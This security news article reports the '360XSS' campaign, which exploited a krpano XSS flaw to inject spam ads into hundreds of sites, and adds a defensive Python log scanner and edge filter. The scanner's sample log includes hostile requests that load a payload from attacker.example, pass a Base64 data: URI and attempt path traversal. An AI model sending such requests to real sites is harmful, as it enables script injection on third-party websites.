Massive XSS Exploit in Virtual Tour Framework Hijacks 350+ Websites for Spam Ads and SEO Manipulation

A cross-site scripting (XSS) vulnerability in the Krpano virtual tour framework has been exploited by attackers to inject malicious scripts across hundreds of websites, manipulating search rankings and fueling a large-scale spam ad campaign.

Overview of the Attack

Dubbed 360XSS, the campaign was discovered by security researcher Oleg Zaytsev, who found that over 350 websites, including government portals, universities, Fortune 500 companies, hotel chains, and news outlets, were compromised. Attackers used these legitimate domains to distribute spam ads for pornography, diet supplements, online casinos, and fake news, as well as to boost YouTube video views.

The attack leverages an XSS flaw in Krpano, a popular framework used to embed 360° images and videos for VR experiences and virtual tours. The vulnerability allows attackers to inject scripts via a specially crafted URL, redirecting visitors to malicious ads while taking advantage of trusted websites to boost search engine rankings—a technique known as SEO poisoning.

How the Exploit Works

  • Attackers abuse the "passQueryParameters" setting in Krpano, which allows passing HTTP parameters to the panorama viewer.
  • A malicious XML parameter in the URL enables the execution of Base64-encoded scripts from a separate website.
  • The script fetches spam ad URLs from another legitimate site, disguising them as credible search results.

The XSS vulnerability (CVE-2020-24901, CVSS score: 6.1) was originally reported in 2020, and while Krpano’s version 1.20.10 introduced restrictions to prevent abuse, certain configurations still left sites vulnerable.

A Unique and Widespread Attack

  • Weaponizing Search Engines: Unlike traditional reflected XSS attacks, which require users to click a malicious link, attackers manipulated search engine results to trick users into organically visiting compromised links.
  • Hijacking Trustworthy Domains: By embedding spam ads within reputable websites, the attackers ensured high search rankings and credibility.
  • Avoiding More Malicious Exploits: While XSS vulnerabilities can be used for credential theft or cookie hijacking, this campaign primarily focused on ad revenue and traffic manipulation, raising suspicions about shady advertising firms being behind the attack.

Mitigation and Fixes

After the responsible disclosure, Krpano released version 1.22.4, which completely removes external XML configuration support, eliminating the XSS risk. The update includes:

  • Blocking external URLs in the passQueryParameters setting.
  • Restricting XML file paths to the current folder structure.

Website owners using Krpano are strongly advised to update to the latest version and disable "passQueryParameters" to prevent exploitation. Additionally, those affected should use Google Search Console to locate and remove any infected pages.
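The following Python script is an added defender-side example, not krpano's own code and not from the article. It serves the two technical passages above: it classifies `xml` query parameter values of the kind the campaign abused (absolute URLs to another site, inline Base64 `data:` payloads, markup, traversal outside the tour folder) and scans access-log lines for them, and the same classifier doubles as an edge check that mirrors the "XML paths restricted to the current folder" rule of the 1.22.4 update for sites that cannot update immediately. The combined log format, the `/tour/` paths and every log line are constructed assumptions; nothing here is taken from real compromised sites.

```python
"""Detect and filter abuse of the krpano `xml` query parameter.

Added example (not krpano code). Assumptions, not from the article:
web-server access logs in the Apache/Nginx "combined" format and panorama
pages served under /tour/. The sample log lines are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: ip - - [time] "METHOD target HTTP/x" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one benign request, three abusive ones, one unrelated.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Feb/2025:12:00:01 +0000] "GET /tour/index.html?xml=tour.xml HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Feb/2025:12:00:02 +0000] "GET /tour/index.html?xml=https%3A%2F%2Fattacker.example%2Fpayload.xml HTTP/1.1" 200 5120 "https://www.google.com/" "Mozilla/5.0"
203.0.113.12 - - [10/Feb/2025:12:00:03 +0000] "GET /tour/index.html?xml=data%3Atext%2Fxml%3Bbase64%2CPGtycGFubz4%3D HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.13 - - [10/Feb/2025:12:00:04 +0000] "GET /tour/index.html?startscene=lobby HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.14 - - [10/Feb/2025:12:00:05 +0000] "GET /tour/index.html?xml=..%2F..%2Fetc%2Fother.xml HTTP/1.1" 404 310 "-" "Mozilla/5.0"
"""


def classify_xml_param(value: str) -> str:
    """Classify one `xml=` value.

    'safe'       relative path that stays in the current folder and ends in .xml
    'external'   absolute or protocol-relative URL (config pulled from another host)
    'data_uri'   inline data: payload (e.g. Base64-encoded XML/script)
    'traversal'  leaves the current folder (../ segments, leading /, backslashes)
    'suspicious' anything else (other URI schemes, markup, odd characters)
    """
    # Decode once more on purpose: catches double-encoded values that a
    # single decoding layer (the web server's) would leave obscured.
    v = unquote(value).strip()
    low = v.lower()
    if low.startswith("data:"):
        return "data_uri"
    if low.startswith(("http://", "https://", "//")):
        return "external"
    if re.match(r"^[a-z][a-z0-9+.-]*:", low):
        return "suspicious"  # javascript:, file:, drive letters, ...
    if v.startswith("/") or "\\" in v or ".." in v.split("/"):
        return "traversal"
    if re.fullmatch(r"[A-Za-z0-9_./-]+\.xml", v):
        return "safe"
    return "suspicious"


def scan_access_log(lines):
    """Return one record per request whose `xml` parameter is not 'safe'."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        for val in parse_qs(parts.query, keep_blank_values=True).get("xml", []):
            verdict = classify_xml_param(val)
            if verdict != "safe":
                hits.append({"ip": m.group("ip"), "path": parts.path,
                             "xml": val, "verdict": verdict})
    return hits


def is_request_allowed(request_target: str) -> bool:
    """Edge (reverse-proxy/WAF) check: allow the request only if every `xml`
    value stays inside the current folder. Requests without an `xml`
    parameter pass; an empty `xml=` is rejected."""
    query = urlsplit(request_target).query
    values = parse_qs(query, keep_blank_values=True).get("xml", [])
    return all(classify_xml_param(v) == "safe" for v in values)


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{hit['ip']} {hit['path']} xml={hit['xml']!r} -> {hit['verdict']}")
```

Run the scanner over real access logs after confirming the log format; every `external` or `data_uri` hit on a krpano page is a request worth correlating with the search-referrer field, since the campaign's traffic arrived through poisoned search results rather than direct links. The edge check is a stop-gap for sites that cannot update yet; it does not replace upgrading krpano and disabling `passQueryParameters`.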

While the identity of the attackers remains unknown, this campaign highlights the growing sophistication of SEO poisoning attacks and the importance of securing third-party frameworks against exploitation.